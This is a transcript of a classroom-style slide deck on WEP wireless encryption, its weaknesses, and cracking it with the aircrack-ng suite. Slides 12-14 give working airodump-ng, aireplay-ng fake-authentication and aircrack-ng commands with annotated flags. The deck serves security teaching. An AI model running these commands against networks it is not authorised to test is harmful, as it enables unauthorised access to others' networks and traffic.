Presentation is loading. Please wait.

Presentation is loading. Please wait.

Wireless Encryption: WEP and cracking it. Eric Shea.

Published byQuentin Harrison Modified over 8 years ago

Similar presentations

Presentation on theme: "Wireless Encryption: WEP and cracking it. Eric Shea."— Presentation transcript:

1 Wireless Encryption: WEP and cracking it. Eric Shea

2 Background on Wi-Fi 802.11over-the-air protocol 802.11a/b/g/n: Speeds Frequencies Range ◦ Physical Obstructions ◦ Example: Cordless Phone

3 Wireless Security Myths MAC address limiting Hidden SSID Using WEP Disable DHCP

4 Wireless Frames/Packets Framing: ◦ Management - clear  Authentication - encrypted ◦ Control ◦ Data - encrypted Error detection

5 Collecting Frames Important Part: ◦ Initalization Vector or IV, is prepended onto packets and its based on a pre-shared key that all the authenticated clients know. ◦ Included in every authorization frame. ◦ In some data frames.

6 Wired Equivalent Privacy (WEP) 1997, deprecated Intended to protect data Prevent unauthorized access to the network Hexadecimal 64/128/256 bit keys

7 Authentication The client station sends an authentication request to the Access Point. The Access Point sends back a clear-text challenge. The client has to encrypt the challenge text using the configured WEP key, and send it back in another authentication request. The Access Point decrypts the material, and compares it with the clear-text it had sent. Depending on the success of this comparison, the Access Point sends back a positive or negative response.

8 War Chalking / War Driving War Chalking - practice of marking sidewalks and walls with special symbols to indicate that wireless access. War Driving - driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get- into wireless networks.

9 Alternative Security WPA/WPA2 ◦ random10 digit or longer key ◦ (1000) Single core computer 500 years to crack VPN ◦ Required authentication ◦ Username/password

10 Cracking WEP Tools = Aircrack-ng Suite / Kismet Kismet ◦ Discover wireless networks Airodump-ng ◦ Capturing packets Aircrack-ng ◦ Brute force crack method Aireplay ◦ Packet injection

11 Kismet Demo

12 Capture packets airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0 -c 9 is the channel for the wireless network --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminate extraneous traffic. -w capture is file name prefix for the file which will contain the IVs. ath0 is the interface name.

13 Packet Injection aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0 -1 means fake authentication 0 reassociation timing in seconds -e teddy is the wireless network name -a 00:14:6C:7E:40:80 is the access point MAC address -h 00:0F:B5:88:AC:82 is our card MAC address ath0 is the wireless interface name

14 Cracking the captured packets aircrack-ng -b 00:14:6C:7E:40:80 output*.cap -b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP. output*.cap selects all files starting with “output” and ending in ”.cap”.

15 Demo Aircrack-ng Suite

16 Aircrack-ng Suite www.aircrack-ng.org Simple wep cracking tutorial ◦ http://www.aircrack- ng.org/doku.php?id=simple_wep_crack http://www.aircrack- ng.org/doku.php?id=simple_wep_crack

Download ppt "Wireless Encryption: WEP and cracking it. Eric Shea."

Similar presentations

Crack WEP Lab Last Update 2014.08.12 1.1.0 1Copyright 2014 Kenneth M. Chipps Ph.D. www.chipps.com.

Crack WEP Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
Wireless Cracking By: Christopher Zacky.

Wireless Cracking By: Christopher Zacky.
Crack WPA Lab Last Update 2014.06.11 1.0.0 1Copyright 2014 Kenneth M. Chipps Ph.D. www.chipps.com.

Crack WPA Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
WLAN Security: Cracking WEP/WPA

WLAN Security: Cracking WEP/WPA
Local Wireless Network - An wireless Access Point (AP) which is the bridge the ethernet network and the wireless network -The AP protect its wireless network.

Local Wireless Network - An wireless Access Point (AP) which is the bridge the ethernet network and the wireless network -The AP protect its wireless network.
Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.

Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.
1 MD5 Cracking One way hash. Used in online passwords and file verification.

1 MD5 Cracking One way hash. Used in online passwords and file verification.
How secure are 802.11b Wireless Networks? By Ilian Emmons University of San Diego.

How secure are b Wireless Networks? By Ilian Emmons University of San Diego.
Wireless Networks: Signaling and Security William Tucker CEN 4516: Computer Networks FGCU: Fort Myers, FL: 09/05.

Wireless Networks: Signaling and Security William Tucker CEN 4516: Computer Networks FGCU: Fort Myers, FL: 09/05.
Security in IEEE 802.11 wireless networks Piotr Polak University Politehnica of Bucharest, December 2008.

Security in IEEE wireless networks Piotr Polak University Politehnica of Bucharest, December 2008.
The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens.

The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens.
Security in Wireless LAN 802.11 Layla Pezeshkmehr CS 265 Fall 2003-SJSU Dr.Mark Stamp.

Security in Wireless LAN Layla Pezeshkmehr CS 265 Fall 2003-SJSU Dr.Mark Stamp.
Wireless Router Setup. Internet Cable Internet Cable (Blue) Machine Cable (Yellow) Power Plug (Black) Reset Button (Red)

Wireless Router Setup. Internet Cable Internet Cable (Blue) Machine Cable (Yellow) Power Plug (Black) Reset Button (Red)
Access Control and Site Security (Part 2) (Tuesday, January 22, 2008) © Abdou Illia – Spring 2008.

Access Control and Site Security (Part 2) (Tuesday, January 22, 2008) © Abdou Illia – Spring 2008.
802.11 Wireless Security Presentation by Paul Petty and Sooner Brooks-Heath.

Wireless Security Presentation by Paul Petty and Sooner Brooks-Heath.
WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.

WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.
Wireless Insecurity.

Wireless Insecurity.
Improving Security. Networking Terms Node –Any device on a network Protocol –Communication standards Host –A node on a network Workstation 1.A PC 2.A.

Improving Security. Networking Terms Node –Any device on a network Protocol –Communication standards Host –A node on a network Workstation 1.A PC 2.A.
Wireless Security Focus on Encryption Steps to secure a Wi-Fi Network.

Wireless Security Focus on Encryption Steps to secure a Wi-Fi Network.
 Any unauthorized device that provides wireless access  Implemented using software, hardware, or a combination of both  It can be intentional or unintentionally.

 Any unauthorized device that provides wireless access  Implemented using software, hardware, or a combination of both  It can be intentional or unintentionally.

Similar presentations

Ads by Google